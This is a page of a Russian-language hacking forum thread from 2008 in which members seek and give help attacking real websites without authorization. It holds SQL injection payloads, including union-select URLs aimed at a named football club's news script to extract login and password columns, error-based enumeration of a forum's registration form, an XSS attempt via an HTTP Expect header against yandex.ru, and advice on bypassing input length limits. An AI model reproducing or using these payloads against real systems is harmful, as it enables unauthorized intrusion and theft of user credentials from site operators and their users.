Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    Добрый вечер,подскажите как реализовать уязвимость:

    1.найден уязвимый параметр login при регистрации,
    ввожу ' выдаётся следующее:

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Unclosed quotation mark before the character string '''. 
    
    /forums/Advising/register.asp, line 49
    2.ввожу
    Code:
    ' having 1=1--
    в уязвимое поле.
    Выдаётся:

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Column 'members.M_Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. 
    
    /forums/Advising/register.asp, line 49
    т.е. я узнал,что имя таблицы: "members", а имя первой колонки: "M_Name"???

    Что делать дальше?
     
    #1601 SQL~In[J]ecTi0n, 9 Apr 2008
    Last edited: 9 Apr 2008
  2. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    to xcedz

    Не катит...)

    Да,единственное,вроде...
     
  3. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    to xcedz

    да))

    P.S. Еще в форме поиска такая же байда.Ток что нашел)

    Знаешь,что дальше делать?
     
  4. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    Если честно,то мои рассуждения дальше пока не идут,опыта и знаний маловато,так что прошу помочь...
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ОПА..Размышления зашли в тупик.Это сообщение о пустом параметре, а не дырка в безопасности :D
    А в логине ограничение на 50 символов нормальный запрос не воткнёшь
     
    #1605 Kakoytoxaker, 9 Apr 2008
    Last edited: 9 Apr 2008
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Начали со скули, скатились к досу. :D
    Блин может я туплю, но это не то ,помоему.Сдесь эксплоит непокатит

    "This happens only to servers which respond a runtime error (System.Web.HttpException)"

    А у нас не та ошибка
    xcedz объясни
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, нашёл такую вот дыру на Яндексе( да лан вам, ну сканер помог()). Короче, атправляем такой запрос :

    GET / HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: www.yandex.ru
    Cookie: yandexuid=4833131207762812;my=YwECAAMHAwEBFwgIBQYDAgQJCAEMATIOAQAVBQQBAgSnExYBABsDAAADAA%3D%3D;YX_SEARCHPREFS=favicons:1,lang:all,ton:1,banners:1,search_form:topbot,numdoc:10,target:_blank,desc:sometimes,lr:,wstat:1,t:2,family:1;;fyandex=1
    Connection: Close
    Expect: <script>alert('suka')</script>
    Pragma: no-cache

    И, походу, срабатывает ( если использывать SQL INJ TOOL > Show in Browzer). Я так и не понял, сработало это или нет, пассивная это XSS или нет (с моим-то опытом да )))) ), но я читал, что НТТР не даёт провести XSS через поле заголовка EXPECT, ибо так и было задумано ))). Там атак много конечно: CRLF, подделка куки, трейс( от которого понту нет,вы знаете ) ))).До черта ещё сканировать будет я чувствую))).Так вот пара вопросов: сработала у мя в таком случае XSS ? если да, то пассивка или активко о_О ? И ещё : зависит ли скорость сканирования только от объёма канала и его загруженности ? Буду весьма признателен за ответы, ня ^_____^

    Также нашёл редиректы на произвольный юрл в некоторых скриптах, которые толком ничо не дают)))( ну кто на такое купится,да и это не ХСС, код не внедряетс, тобишь ночевать не будет на страничке ( ).

    P.S. Учимся ломать мир о_О
     
    #1607 Велемир, 10 Apr 2008
    Last edited: 10 Apr 2008
  8. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Велемир
    невидно самого пути к уязвиомому скрипту
    запрос должен выглядить так

    GET http://yandex.ru/ HTTP/1.0
    итд..
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Тык а путь же / ,тобишь index.html. В запросе нету уязвимого скрипт,мошь просто ошибка высветилась и выполнился скрипт <script>alert('suka')</script>.Эт надо делать через xmlHTTP походу...

    This script is vulnerable to Cookie manipulation attacks.

    By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
    Affected items
    /cgi-bin/banner_count.pl
    /cgi-bin/customize.pl
    /cgi-bin/save-setup.pl
    /cy

    Тож дырень непонятная.Понту от того,что я могу менять куки?:Р Сканер тупит имхо...хотя, мона мета теги менять...Вот ток как хз
     
    #1609 Велемир, 10 Apr 2008
    Last edited: 10 Apr 2008
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2SQL~In[J]ecTi0n, ник обязывает знать, судя по ошибкам там MS Access. Тяжеловато провести инъекцию, но возможно, я делал, чего и тебе желаю...)
     
  11. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Ухты! Как много ты умных слов ты знаешь. Не можешь отличить активку от пассивки, а уже xss через HTTP заголовок замутил. TRACE бесполезный? А если на сайте куки с атрибутом httpOnly? Эту пассивку можно нормально использовать (с токи зрения жертвы) только через swf или через отправку пакета через XMLHttpRequest

    Необязательно.
     
    _________________________
    #1611 +toxa+, 10 Apr 2008
    Last edited: 10 Apr 2008
  12. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Там обычный MSSQL:
    Code:
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
    По-этому для дальнейшего проведения SQL~In[J]ecTi0n читайте статью кеша https://forum.antichat.ru/threadnav30501-1-10.html
    там все описано в полном объеме.
    А по поводу
    Ограничение в 50 символов обходится, например простым сохранением странички на локале и дописыванием удаленного обработчика в коде html.
    Хотя мона просто воспользоваться FireFox Post Extension например или руками отправить пост...
     
    1 person likes this.
  13. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    а тогда куда же запрос отправлять?
     
  14. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    GET /index.php
    Host: site.com
     
    _________________________
  15. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    кто знает в *.pl страницах существуют существенные уязвимости например при которых мона файлик на комп удаленный заливать..... xss не интерисуют.... там соединение https и вдобавок ни каких cookie....

    да и про VS Billing v. 1.0 rc2 (c)2003 ктонить слышал???
     
    _________________________
  16. SQL~In[J]ecTi0n

    SQL~In[J]ecTi0n Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    9
    Likes Received:
    11
    Reputations:
    5
    Знающие люди,кому не сложно помочь,стукните в 380-225-866

    P.S. Статью [ cash ] 'a уже до дыр зачитал.Не могу выполнить ни одно из действий,описанных там,т.к.постоянно выдаётся ошибка "Incorrect syntax near <оператор>"
     
    #1616 SQL~In[J]ecTi0n, 10 Apr 2008
    Last edited: 10 Apr 2008
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Лучше бы сказал как, или привёл бы пример работающего пост запроса с параметрами.
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А что если при запросе из таблицы users по клонкам login,pass вернулось 'void:pass'
    База пустая чтоли? :Р Версия бд 4.1.18

    Warning: getimagesize(6): failed to open stream: No such file or directory in /www/anthost/www/htdocs/fc-anji/news.php on line 141

    Query failed: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

    использовал знаменитый алгоритм шифрования AES:РРР

    http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@version_compile_os,0x71),0x71),3,4,5,6/*

    portbld-freebsd5.4


    http://www.fc-anji.ru/news.php?id=-230+union+select+1,aes_decrypt(aes_encrypt(@@basedir,0x71),0x71),3,4,5,6/*

    Тут неполучилось:Р,с одним @ тоже))
     
    #1618 Велемир, 10 Apr 2008
    Last edited: 10 Apr 2008
  19. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    иди доки лучше по читай, здесь никто никому ничего не должен объснять или показывать.
    Если что-то вернулось значит не пусто, используй объединение concat или concat_ws с разделителем можно просто :, а можно в хексе.
    concat(user,':',pass)
    concat_ws(0x3a,user,pass)
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,login,pass),3,4,5,6+from+users/*

    Та же ошибка, но вернулось всё то же самое, что и при предыдущем запросе:

    void: pass ))))))

    Самое интересное, что если использовать лимит и подставить 0,1 , то и вернёт void: pass.Дальше не возвращает ).Мошь он нуль и возвращает?:Р Или это какой-то новый способ защиты ?))))
    Да,и вот ещё что: доступа к mysql.user и information?schema.tables нету (
     
    #1620 Велемир, 10 Apr 2008
    Last edited: 10 Apr 2008
    1 person likes this.
Thread Status:
Not open for further replies.